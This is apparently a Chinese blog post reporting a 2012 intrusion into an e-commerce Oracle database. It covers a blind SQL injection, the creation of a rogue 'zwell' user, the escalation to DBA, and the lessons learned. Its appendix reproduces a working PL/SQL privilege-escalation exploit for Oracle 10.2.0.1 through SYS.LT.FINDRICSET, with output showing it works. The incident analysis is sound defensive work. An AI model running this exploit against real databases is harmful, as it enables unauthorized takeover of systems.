事件过程:
2012-10-19日,同事在日常巡检时发现一套对外服务的电子商务系统后台Oracle数据库中出现了一个名为zwell的用户,并且,该用户具有DBA权限。
xxx 2012-10-19 10:13:34
我发现个问题。
在数据库里面,多了个zwell用户,创建日期是9月7日,有dba权限
按照管理规定,所有的Oracle数据库均有DDL触发器,查看触发器发现:
1 CREATE ZWELL CREATE USER zwell IDENTIFIED BY ******* WD_WEB 2012/9/7 13:53:59 11028547 FALSE SYSTEM 5 WD_WEB 57 ptserver8 10.x.x.x tcp DATABASE
1 WD_WEB 12200617 ROLE PRIVILEGE GRANT 2012/10/9 15:38:20 10.0.8.10 grant dba to zwell
此用户在2012/9/7 13:53:59,通过CREATE USER zwell IDENTIFIED BY ******* SQL语句创建,发出此SQL的服务器为WEB服务器集群第8台(ptserver8),IP地址为WEB集群F5接口地址(10.x.x.x)
并且,在2012/10/9 15:38:20,通过grant dba to zwell SQL语句,将zwell用户提升为DBA权限
此用户已建立了1个多月,例行检查只检查拥有DBA权限的用户,导致此用户被建立很长时间后才被发现
2012-10-19日,通过对WEB服务器的apache日志进行检查,在2012/9/7 13:53:59秒前后有大量的SQL注入行为,发出SQL注入入侵的源IP(113.71.184.32)属于广东省佛山市电信:
但由于apache日志记录时间顺序问题,导致当时并未找到SQL注入的对应日志
2012-10-19日下午,紧急对此电子商务网站进行应用漏洞扫描,发现高危漏洞
2012-10-19日夜间, 鉴于短时间内无法确认被入侵途径及目的,经多方商议,建议先进行如下处理
1. 应用系统数据库用户存在IMP_FULL_DATABASE权限,而此权限应为过度授权,拥有此权限则可创建用户。进行收回
2. 尽快修改数据库账户密码,以及相关操作系统密码
3. 将数据库版本由10.2.0.1升级至10.2.0.5
4. 对数据库内关键信息进行审计
2012-10-20日早,对apache日志进行仔细检查后,确认此次入侵为SQL方式入侵,入侵入口为/service/service.do盲注方式,发出SQL注入入侵的源IP(119.57.81.78)属于北京市东四IDC机房:
yyy 10:52:51
找到赋权语句了,可以确认是SQL注入方式提权
yyy 10:53:04
yyy 10:53:27
2012-10-20日下午,再次检查发出创建用户SQL的ptserver8服务器的apache日志,发现了与创建用户对应的日志信息:
创建用户操作也是通过/service/service.do进行SQL注入,至此,整个入侵流程均已查清。
事件分析:
在此次安全事件中,黑客使用WEB页面的盲注漏洞,采用SQL注入的方式创建了zwell用户,并且,利用了Oracle 10.2.0.1的提权漏洞,赋予zwell用户DBA权限。
经验教训:
1.WEB应用应进行完善的代码检查,避免SQL注入漏洞
有很多方法可以避免SQL注入漏洞,比如,最常见的,使用绑定变量,但由于此应用程序为外包开发方式,供应商之前已开发了一套基础版本,此版本为在基础版本的升级版本,因此,导致基础版本的问题也一并带入了生产环境,导致此漏洞
2.未进行完善的代码安全检查
目前有很多工具可以对应用进行安全检查,类似的SQL注入型漏洞一般都可以检查出来,但由于仓促上线,经验也不够丰富,因此,导致应用带故上线
3.数据库版本未升级
典型的问题,数据库版本过低导致存在提权漏洞,如数据库打了补丁,至少不会导致zwell用户被提升权限
4.日常检查不够全面
只对拥有DBA权限的用户进行检查,导致被攻击后很长时间才发现攻击行为
5.对于WEB应用,日志是很有必要进行保留的,如果日志没有被改动,基本都可以从日志中重现整个安全事件的完整过程。
6.即使能够查到来源IP,此IP往往也是肉机IP,比如,在此次事件中,两次行为应是同一人完成,但创建用户的来源IP为广东省佛山市电信,提权IP为北京市东四IDC机房
附-Oralce 10.2.0.1|提权漏洞:
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
PL/SQL Release 10.2.0.1.0 - Production
CORE 10.2.0.1.0 Production
TNS for Linux: Version 10.2.0.1.0 - Production
NLSRTL Version 10.2.0.1.0 – Production
SQL> create user webtest identified by webtest;
用户已创建。
SQL> grant connect to webtest;
授权成功。
SQL> select * from dba_sys_privs where grantee='WEBTEST';
未选定行
SQL> select * from dba_role_privs where grantee=’WEBTEST';
GRANTEE GRANTED_ROLE ADM DEF
------------------------------ ------------------------------ --- ---
WEBTEST CONNECT NO YES --只给WD_WEB用户赋CONNECT权限,最小权限
SQL> conn webtest/webtest@xxxx:1521/orcl
已连接。
SQL> DECLARE
2 MYC NUMBER;
3 BEGIN
4 MYC := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(MYC,
6 'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO WEBTEST'';commit;end;',
7 0);
8 DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);
9 BEGIN
10 SYS.LT.FINDRICSET('.''||dbms_sql.execute( ' || MYC || ' )||'''')--',
11 'x');
12 END;
13 raise NO_DATA_FOUND;
14 EXCEPTION
15 WHEN NO_DATA_FOUND THEN
16 DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);
17 WHEN OTHERS THEN
18 DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);
19 END;
20 /
PL/SQL 过程已成功完成。
--网上随便找的脚本,执行提权操作
SQL> conn system/xxx@xxx:1521/orcl
已连接。
SQL> select * from dba_sys_privs where grantee='WEBTEST';
GRANTEE PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
WEBTEST UNLIMITED TABLESPACE NO
SQL> select * from dba_role_privs where grantee='WEBTEST';
GRANTEE GRANTED_ROLE ADM DEF
------------------------------ ------------------------------ --- ---
WEBTEST CONNECT NO YES
WEBTEST DBA NO YES --多出了DBA权限
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/19423/viewspace-760027/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/19423/viewspace-760027/